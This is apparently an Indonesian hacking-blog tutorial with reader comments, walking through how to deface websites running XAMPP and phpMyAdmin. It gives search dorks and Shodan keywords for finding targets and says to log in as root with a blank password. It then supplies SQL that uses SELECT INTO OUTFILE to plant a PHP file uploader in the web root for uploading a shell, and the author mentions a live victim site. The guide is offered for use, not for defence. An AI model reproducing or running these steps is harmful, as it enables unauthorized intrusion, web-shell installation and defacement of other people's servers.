Hello sobat SBH kembali lgi dengan saya,maaf udh lama gak upload hehe karna sibuk ngehek :v canda²
Oke pada kesempatan ini gua mau ngasih tutor cara deface lgi
- Dork:
- dork: intitle:"XAMPP"
- inurl:/phpinfo.php
- inurl:/xampp/lang.php
- Atau
- Cari target di shodan.io pake keyword:
- xampp
- phpmyadmin
- Win32
- Win64
Exploit untuk php my admin nya
site,com/phpmyadmin
site,com/pMa
site,com/dbsql
dll
Kalau pas di exploit suruh login kalian isi user
root
Untuk password kosongin aja,klo vuln masuk yah ke database nya,,disini gua punya live target,oke sekrng kita upload uploader di phpmyadmin nya,oh iya kalain harus tau yah document root nya
cara nya
site,com/phpinfo.php
site,com/info.php
site,com/test.php
site,com/tes.php
Atau cari page eror biasa nya ada keluar document root nya,ini guna nya buat into out file,kalau gak tau ini,mending skip cari web lain
Contoh seperti ini:
Tpi biasa nya tampilan web nya seperti ini,biar gk susah cari document root nya kalian pencet titik 3 di pojok kanan atas chorome,terus kalian pilih cari di halaman terus kalian tulis document root
Mari kita upload uploader kita kalau sudah tau document root nya kalian pencet yang Sql terus isi ini
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload2.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'DOCUMENT ROOT KALIAN/upload2.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Seperti ini
Lalu pencet go,kalau sudah kalain pencet sql lagi terus isi ini
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "DOCUMENT ROOT KALIAN/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "
<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "";?>');
SELECT * INTO OUTFILE ' DOCUMENT ROOT KALIAN/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Sekrng kita akses apakah uploader kita terupload
Yap sudah terupload tinggal kita upload shell deh,nama akses kalian ini
sitelu.com/upload2.php
See you
Ini web yang saya jadikan live target dia memakai server windows,kalau target kalian memakai linux,bisa liat d link bawah
Via youtube:
tag:deface poc iof,deface poc phpmyadmin,cara upload shell di phpmyadmin,cara upload shell,phpmyadmin
CODETAB itu gimana bang?
BalasHapusEdit yang dir nya aja yg lain nya gaush d edit
Hapus